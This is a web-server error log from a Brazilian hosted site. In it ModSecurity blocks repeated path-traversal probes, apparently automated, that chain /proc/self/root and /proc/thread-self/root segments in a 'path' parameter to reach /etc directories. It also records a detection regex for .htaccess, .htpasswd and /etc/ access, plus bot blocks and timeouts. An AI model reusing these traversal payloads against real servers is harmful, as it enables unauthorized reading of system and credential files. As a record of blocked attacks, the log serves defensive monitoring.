[Wed Mar 18 20:59:23.996724 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:52068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8WymAPhZkrhU8w4mt5AAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:59:26.193927 2026] [proxy_fcgi:error] [pid 29882:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35306] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:59:26.934852 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:35600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8XgkwaGbbGflqUZBYIgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 20:59:28.007943 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.241.31:51246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8YCmAPhZkrhU8w4mt6QAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:59:31.851967 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:51262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8Y9a6ubjKNq_cu4bgEAAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:59:39.133824 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:51272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8a9a6ubjKNq_cu4bgEwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:59:47.353818 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35532] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:59:52.069838 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:45006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8eAkwaGbbGflqUZBYOQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 21:00:01.610283 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:60742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8gSmAPhZkrhU8w4mt-AAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:00:17.015140 2026] [proxy_fcgi:error] [pid 29882:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35728] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:00:38.305785 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36194] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:00:59.440627 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36528] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:01:22.761832 2026] [proxy_fcgi:error] [pid 15051:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36772] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:01:38.766893 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.244.43:42930] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs84uoXxyEfFpUF8f-6FAAAAVM"]
[Wed Mar 18 21:01:50.787184 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:53092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs87imAPhZkrhU8w4muIQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:01:52.441802 2026] [proxy_fcgi:error] [pid 23798:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36988] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:02:13.933232 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:43834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs9Bew_le52K8_3pV0fZgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:02:14.205947 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:37226] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:02:35.126891 2026] [proxy_fcgi:error] [pid 23798:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37638] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:02:57.125792 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37940] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:03:18.862993 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:44170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs9RuyqAr6etmhZHNoMXgAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:03:19.115294 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38278] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:03:40.682044 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.228.61:37032] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs9XOw_le52K8_3pV0fjwAAAg0"]
[Wed Mar 18 21:03:54.833921 2026] [:error] [pid 23798:tid 140411708356352] [client 74.7.241.31:50750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs9aj-9rzzdA3Ti0NCWywAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:03:55.031091 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38418] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:04:16.121914 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38876] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:04:38.872689 2026] [proxy_fcgi:error] [pid 29882:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39102] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:05:01.310955 2026] [proxy_fcgi:error] [pid 15051:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39280] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:05:30.261891 2026] [proxy_fcgi:error] [pid 27403:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39428] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:05:33.646125 2026] [:error] [pid 23798:tid 140411725141760] [client 74.7.241.31:39784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs9zT-9rzzdA3Ti0NCW-gAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:05:51.129844 2026] [proxy_fcgi:error] [pid 23798:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:39812] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:06:12.125273 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40076] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:06:20.125991 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:59946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs9_Pu8EFLIOrSqIptDWQAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:06:23.942414 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:50676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs9_-yqAr6etmhZHNoMnwAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 21:06:33.057864 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:40276] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:06:34.502454 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:50260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-CuoXxyEfFpUF8f-6RwAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:06:54.115086 2026] [proxy_fcgi:error] [pid 15051:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:40498] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:06:58.556066 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:53266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-IgkwaGbbGflqUZBYZwAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:07:05.102436 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:50478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-JwkwaGbbGflqUZBYaAAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:07:09.156515 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:48604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs-LQkwaGbbGflqUZBYagAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:07:15.122377 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40746] AH01075: Error dispatching request to : (polling)
